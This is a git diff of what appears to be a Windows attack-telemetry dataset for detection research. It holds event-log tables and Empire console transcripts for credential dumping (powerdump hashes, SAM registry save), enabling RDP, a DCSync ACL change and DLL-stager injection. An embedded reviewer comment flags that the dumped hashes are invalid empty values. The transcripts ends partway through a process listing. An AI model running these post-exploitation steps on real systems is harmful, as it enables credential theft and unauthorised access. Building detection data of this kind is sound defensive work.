Events | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 206 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 182 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 98 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 66 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 38 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 17 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 7 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 4 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 323 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule credentials/powerdump* +(Empire: powershell/credentials/powerdump) > info + + Name: Invoke-PowerDump + Module: powershell/credentials/powerdump + NeedsAdmin: True + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + DarkOperator + winfang + Kathy Peters + ReL1K + +Description: + Dumps hashes from the local system using Posh-SecMod's + Invoke-PowerDump + +Comments: + https://github.com/darkoperator/Posh- + SecMod/blob/master/PostExploitation/PostExploitation.psm1 + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True TKV35P8X Agent to run module on. 
+ +(Empire: powershell/credentials/powerdump) > execute +[*] Tasked TKV35P8X to run TASK_CMD_JOB +[*] Agent TKV35P8X tasked with task ID 34 +[*] Tasked agent TKV35P8X to run module powershell/credentials/powerdump +(Empire: powershell/credentials/powerdump) > Job started: 36KA8E +Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: + + +Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: + + +DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: + + +WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: + + +Nora:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: + + + + +(Empire: powershell/credentials/powerdump) > +``` \ No newline at end of file diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.tar.gz b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.tar.gz new file mode 100644 index 00000000..d076af6c Binary files /dev/null and b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_powerdump.tar.gz differ diff --git a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_reg_dump_sam.md b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_reg_dump_sam.md index 22c471e8..bc37b5c3 100644 --- a/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_reg_dump_sam.md +++ b/small_datasets/windows/credential_access/credential_dumping_T1003/credentials_from_registry/empire_reg_dump_sam.md @@ -1,4 +1,3 @@ - # Empire Reg Dump SAM An adversary with administrator privileges can use the windows reg utility to dump the SAM registry hive. 
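Review bot: the Invoke-PowerDump output pasted in the empire_powerdump.md hunk reports `aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0` for all five accounts (Administrator, Guest, DefaultAccount, WDAGUtilityAccount, Nora), which is the well-known empty LM/NT hash pair, while empire_mimikatz_lsadump.md in the same change dumps the same host (HR001) and shows non-empty NTLM hashes for WDAGUtilityAccount (`63a935cccb1d1be6c4011ec2a68f1a95`) and Nora (`f9558f5eff6314996c96ec2c3800d3f0`). The two outputs cannot both be right, and the identical empty-hash values for every account indicate the module did not produce a valid dump on this target. Add a sentence under the description saying so, so that analysts using the dataset know it captures the module's execution telemetry (the Process Creation, Registry and Handle Manipulation rows in the table above) but that the hash values in the output are not usable, and point them to the lsadump variation for a capture with valid output.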
@@ -53,7 +52,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 153 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 377 | -## Empire Activity +## Attacker Activity ``` shell reg save HKLM\sam sam diff --git a/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/README.md b/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/README.md index fb5ef17e..56d5f3d8 100644 --- a/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/README.md +++ b/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/README.md @@ -4,6 +4,6 @@ An adversary with valid permissions can modify permissions in active directory o ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_dcsync_acl](./empire_dcsync_acl.md) | 2019-03-01125905 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_dcsync_acl](./empire_dcsync_acl.md) | 2019-03-01125905 | \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/empire_dcsync_acl.md b/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/empire_dcsync_acl.md index 1c444265..444a7f25 100644 --- a/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/empire_dcsync_acl.md +++ b/small_datasets/windows/defense_evasion/file_permissions_modifications_T1222/ad_object_modification/empire_dcsync_acl.md 
@@ -1,4 +1,3 @@ - # Empire DCSync ACL An adversary with enough permissions (domain admin) can add an ACL to the Root Domain for any user, despite being in no privileged groups, having no malicious sidHistory, and not having local admin rights on the domain controller itself . @@ -58,7 +57,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Executing Pipeline | 264 | -## Empire Activity +## Attacker Activity ``` scriptimport data/module_source/situational_awareness/network/powerview.ps1 diff --git a/small_datasets/windows/defense_evasion/modify_registry_T1112/README.md b/small_datasets/windows/defense_evasion/modify_registry_T1112/README.md new file mode 100644 index 00000000..ee346527 --- /dev/null +++ b/small_datasets/windows/defense_evasion/modify_registry_T1112/README.md @@ -0,0 +1,10 @@ +# Modify Registry + +Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ----------- | ------- | --------- | +| shire | [empire_enable_rdp](./empire_enable_rdp.md) | 2019-05-18203650 | +| shire | [empire_wdigest_downgrade](./empire_wdigest_downgrade.md) | 2019-05-18201922 | \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.md b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.md new file mode 100644 index 00000000..4935875c --- /dev/null +++ b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.md 
@@ -0,0 +1,101 @@ +# Empire Enable RDP + +Enables RDP on the remote machine and adds a firewall exception. + +## Technique(s) ID + +T1112 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_enable_rdp.tar.gz](./empire_enable_rdp.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18203650 + +## About this file + +| log_name | source_name | task | record_number | +|------------------------------------------------------------------------|------------------------------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 169 | +| System | Microsoft-Windows-TerminalServices-RemoteConnectionManager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 115 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 56 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 24 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 11 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 9 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 9 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 9 | +| Security | Microsoft-Windows-Security-Auditing | MPSSVC Rule-Level Policy Change | 9 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 7 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 4 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 3 | +| Security | Microsoft-Windows-Security-Auditing | Computer Account Management | 2 | +| Security | Microsoft-Windows-Security-Auditing | Other System Events | 2 | +| Security | 
Microsoft-Windows-Security-Auditing | System Integrity | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Microsoft-Windows-Windows Firewall With Advanced Security/Firewall | Microsoft-Windows-Windows Firewall With Advanced Security | na | 9 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational | Microsoft-Windows-TerminalServices-RemoteConnectionManager | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 701 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 481 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 452 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 293 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 89 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 18 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 15 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 11 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 7 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 3 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 140 | + +## Attackers Activity + +``` +(Empire: TKV35P8X) > usemodule management/enable_rdp* 
+(Empire: powershell/management/enable_rdp) > info + + Name: Enable-RDP + Module: powershell/management/enable_rdp + NeedsAdmin: True + OpsecSafe: False + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @harmj0y + +Description: + Enables RDP on the remote machine and adds a firewall + exception. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True TKV35P8X Agent to run module on. + +(Empire: powershell/management/enable_rdp) > execute +[>] Module is not opsec safe, run? [y/N] y +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 21 +[*] Tasked agent TKV35P8X to run module powershell/management/enable_rdp +(Empire: powershell/management/enable_rdp) > The operation completed successfully. + + +(Empire: powershell/management/enable_rdp) > +``` \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.tar.gz b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.tar.gz new file mode 100644 index 00000000..0f2f6d3b Binary files /dev/null and b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_enable_rdp.tar.gz differ diff --git a/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.md b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.md new file mode 100644 index 00000000..4cb05c5b --- /dev/null +++ b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.md 
@@ -0,0 +1,56 @@ +# Empire Wdigest Downgrade + +Sets wdigest on the machine to explicitly use by setting HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential + +## Technique(s) ID + +T1112 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_wdigest_downgrade.tar.gz](./empire_wdigest_downgrade.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18201922 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 220 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 100 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 83 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 16 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 4 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Authentication Service | 1 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | 
Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1755 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 112 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 92 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 78 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 183 | + +## Attacker Activity \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.tar.gz b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.tar.gz new file mode 100644 index 00000000..a6ff41e9 Binary files /dev/null and b/small_datasets/windows/defense_evasion/modify_registry_T1112/empire_wdigest_downgrade.tar.gz differ diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/README.md b/small_datasets/windows/defense_evasion/process_injection_T1055/README.md new file mode 100644 index 00000000..16bf5521 --- /dev/null +++ b/small_datasets/windows/defense_evasion/process_injection_T1055/README.md 
@@ -0,0 +1,10 @@ +# Process Injection + +Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_psinject](./empire_psinject.md) | 2019-05-18200432 | +| shire | [empire_dll_injection](./empire_dll_injection.md) | 2019-05-18221344 | \ No newline at end of file diff --git a/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.md b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.md new file mode 100644 index 00000000..7f495eab --- /dev/null +++ b/small_datasets/windows/defense_evasion/process_injection_T1055/empire_dll_injection.md 
@@ -0,0 +1,306 @@ +# Empire Dll Injection + +Invoke-DllInjection injects a Dll into an arbitrary process. It does this by using VirtualAllocEx to allocate memory the size of the DLL in the remote process, writing the names of the DLL to load into the remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread to invoke LoadLibraryA in the context of the remote process. + +## Technique(s) ID + +T1055 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_dll_injection.tar.gz](./empire_dll_injection.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18221344 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 753 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 205 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 180 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 40 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 14 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 11 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 10 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 10 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 9 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 6 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization 
Policy Change | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 42 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 392 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 189 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 129 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 94 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 32 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 19 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | CreateRemoteThread detected (rule: CreateRemoteThread) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 628 | + +## Attacker Activity + +``` +(Empire: listeners) > usestager windows/dll +(Empire: stager/windows/dll) > info + +Name: DLL Launcher + +Description: + Generate a PowerPick Reflective DLL to inject with + stager code. 
+ +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to use. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + Obfuscate False False Switch. Obfuscate the launcher + powershell code, uses the + ObfuscateCommand for obfuscation types. + For powershell only. + Proxy False default Proxy to use for request (default, none, + or other). + Language True powershell Language of the stager to generate. + OutFile True /tmp/launcher.dll File to output dll to. + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Arch True x64 Architecture of the .dll to generate + (x64 or x86). + ObfuscateCommand False Token\All\1 The Invoke-Obfuscation command to use. + Only used if Obfuscate switch is True. + For powershell only. + StagerRetries False 0 Times for the stager to retry + connecting. + + +(Empire: stager/windows/dll) > set Listener https +(Empire: stager/windows/dll) > execute + +[*] Stager output written out to: /tmp/launcher.dll + +(Empire: stager/windows/dll) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 22:10:13 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 22:10:13 https + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 22:10:09 https + + +(Empire: agents) > interact TKV35P8X +(Empire: TKV35P8X) > usemodule code_execution/invoke_dllinjection +(Empire: powershell/code_execution/invoke_dllinjection) > set Dll launcher.dll +(Empire: powershell/code_execution/invoke_dllinjection) > back +(Empire: TKV35P8X) > ps +[*] Tasked TKV35P8X to run TASK_SHELL +[*] Agent TKV35P8X tasked with task ID 29 
+(Empire: TKV35P8X) > ProcessName PID Arch UserName +----------- --- ---- -------- +Idle 0 x64 N/A +System 4 x64 N/A +Registry 68 x64 NT AUTHORITY\SYSTEM +WindowsInternal.ComposableShell.Experiences.TextInput.InputApp 184 x64 SHIRE\nmartha +svchost 264 x64 NT AUTHORITY\LOCAL + SERVICE +smss 276 x64 NT AUTHORITY\SYSTEM +svchost 324 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 352 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 368 x64 NT AUTHORITY\LOCAL + SERVICE +csrss 372 x64 NT AUTHORITY\SYSTEM +svchost 388 x64 NT AUTHORITY\SYSTEM +svchost 432 x64 NT AUTHORITY\SYSTEM +wininit 440 x64 NT AUTHORITY\SYSTEM +csrss 448 x64 NT AUTHORITY\SYSTEM +winlogon 508 x64 NT AUTHORITY\SYSTEM +services 532 x64 NT AUTHORITY\SYSTEM +lsass 540 x64 NT AUTHORITY\SYSTEM +svchost 672 x64 NT AUTHORITY\SYSTEM +fontdrvhost 680 x64 Font Driver Host\UMFD-1 +fontdrvhost 688 x64 Font Driver Host\UMFD-0 +svchost 748 x64 NT AUTHORITY\SYSTEM +svchost 780 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 832 x64 NT AUTHORITY\SYSTEM +svchost 852 x64 NT AUTHORITY\LOCAL + SERVICE +dwm 936 x64 Window Manager\DWM-1 +svchost 1000 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1048 x64 NT AUTHORITY\SYSTEM +svchost 1076 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 1164 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1180 x64 NT AUTHORITY\SYSTEM +svchost 1208 x64 NT AUTHORITY\NETWORK + SERVICE +RuntimeBroker 1220 x64 SHIRE\nmartha +svchost 1252 x64 NT AUTHORITY\SYSTEM +svchost 1280 x64 NT AUTHORITY\LOCAL + SERVICE +backgroundTaskHost 1392 x64 SHIRE\nmartha +svchost 1400 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1424 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1528 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1572 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1608 x64 NT AUTHORITY\SYSTEM +backgroundTaskHost 1676 x64 SHIRE\nmartha +Memory Compression 1744 x64 NT AUTHORITY\SYSTEM +svchost 1788 x64 NT AUTHORITY\SYSTEM +svchost 1800 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 1860 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 1876 x64 NT 
AUTHORITY\SYSTEM +svchost 1884 x64 NT AUTHORITY\SYSTEM +SkypeApp 1896 x64 SHIRE\nmartha +svchost 1924 x64 NT AUTHORITY\SYSTEM +svchost 1952 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 2000 x64 NT AUTHORITY\SYSTEM +RuntimeBroker 2012 x64 SHIRE\nmartha +svchost 2024 x64 NT AUTHORITY\LOCAL + SERVICE +WmiPrvSE 2036 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 2132 x64 NT AUTHORITY\SYSTEM +spoolsv 2244 x64 NT AUTHORITY\SYSTEM +svchost 2260 x64 NT AUTHORITY\SYSTEM +svchost 2288 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 2372 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 2380 x64 NT AUTHORITY\SYSTEM +svchost 2388 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 2404 x64 NT AUTHORITY\SYSTEM +Sysmon 2440 x64 NT AUTHORITY\SYSTEM +svchost 2468 x64 NT AUTHORITY\SYSTEM +svchost 2492 x64 SHIRE\nmartha +svchost 2512 x64 NT AUTHORITY\SYSTEM +wlms 2528 x64 NT AUTHORITY\SYSTEM +svchost 2712 x64 NT AUTHORITY\LOCAL + SERVICE +unsecapp 2824 x64 NT AUTHORITY\SYSTEM +SkypeBackgroundHost 2992 x64 SHIRE\nmartha +conhost 3096 x64 SHIRE\nmartha +notepad 3124 x64 SHIRE\nmartha +svchost 3168 x64 NT AUTHORITY\SYSTEM +RuntimeBroker 3276 x64 SHIRE\nmartha +taskhostw 3288 x64 SHIRE\nmartha +ShellExperienceHost 3300 x64 SHIRE\nmartha +svchost 3304 x64 SHIRE\nmartha +svchost 3368 x64 NT AUTHORITY\SYSTEM +svchost 3472 x64 NT AUTHORITY\SYSTEM +svchost 3476 x64 NT AUTHORITY\NETWORK + SERVICE +Microsoft.Photos 3704 x64 SHIRE\nmartha +svchost 3736 x64 NT AUTHORITY\SYSTEM +svchost 3756 x64 NT AUTHORITY\LOCAL + SERVICE +conhost 3816 x64 SHIRE\nmartha +svchost 3852 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 3984 x64 NT AUTHORITY\SYSTEM +MicrosoftEdgeCP 4044 x64 SHIRE\nmartha +sihost 4068 x64 SHIRE\nmartha +svchost 4108 x64 NT AUTHORITY\SYSTEM +ApplicationFrameHost 4132 x64 SHIRE\nmartha +ctfmon 4144 x64 SHIRE\nmartha +svchost 4240 x64 NT AUTHORITY\LOCAL + SERVICE +OneDrive 4352 x86 SHIRE\nmartha +svchost 4524 x64 NT AUTHORITY\SYSTEM +explorer 4592 x64 SHIRE\nmartha +RuntimeBroker 4616 x64 SHIRE\nmartha 
+Windows.WARP.JITService 4828 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 4864 x64 SHIRE\nmartha +SearchUI 4928 x64 SHIRE\nmartha +dllhost 5064 x64 SHIRE\nmartha +RuntimeBroker 5152 x64 SHIRE\nmartha +powershell 5172 x64 SHIRE\nmartha +powershell 5204 x64 SHIRE\pgustavo +svchost 5300 x64 NT AUTHORITY\LOCAL + SERVICE +WmiPrvSE 5312 x64 NT AUTHORITY\SYSTEM +powershell 5452 x64 SHIRE\nmartha +dllhost 5796 x64 SHIRE\nmartha +svchost 5820 x64 NT AUTHORITY\SYSTEM +YourPhone 6048 x64 SHIRE\nmartha +svchost 6160 x64 NT AUTHORITY\LOCAL + SERVICE +svchost 6304 x64 NT AUTHORITY\SYSTEM +RuntimeBroker 6312 x64 SHIRE\nmartha +svchost 6336 x64 SHIRE\nmartha +svchost 6392 x64 NT AUTHORITY\SYSTEM +SearchIndexer 6464 x64 NT AUTHORITY\SYSTEM +smartscreen 6500 x64 SHIRE\nmartha +SecurityHealthSystray 6560 x64 SHIRE\nmartha +SecurityHealthService 6640 x64 NT AUTHORITY\SYSTEM +SgrmBroker 6672 x64 NT AUTHORITY\SYSTEM +svchost 6772 x64 NT AUTHORITY\LOCAL + SERVICE +RuntimeBroker 6776 x64 SHIRE\nmartha +taskhostw 6792 x64 SHIRE\nmartha +svchost 6856 x64 NT AUTHORITY\SYSTEM +svchost 7248 x64 NT AUTHORITY\NETWORK + SERVICE +svchost 7292 x64 NT AUTHORITY\SYSTEM +svchost 7844 x64 NT AUTHORITY\SYSTEM +WmiPrvSE 7944 x64 NT AUTHORITY\NETWORK + SERVICE +conhost 7976 x64 SHIRE\pgustavo +MicrosoftEdgeSH 8376 x64 SHIRE\nmartha +svchost 8516 x64 NT AUTHORITY\SYSTEM +RuntimeBroker 8804 x64 SHIRE\nmartha +MicrosoftEdge 9012 x64 SHIRE\nmartha +browser_broker 9108 x64 SHIRE\nmartha +Windows.WARP.JITService 9160 x64 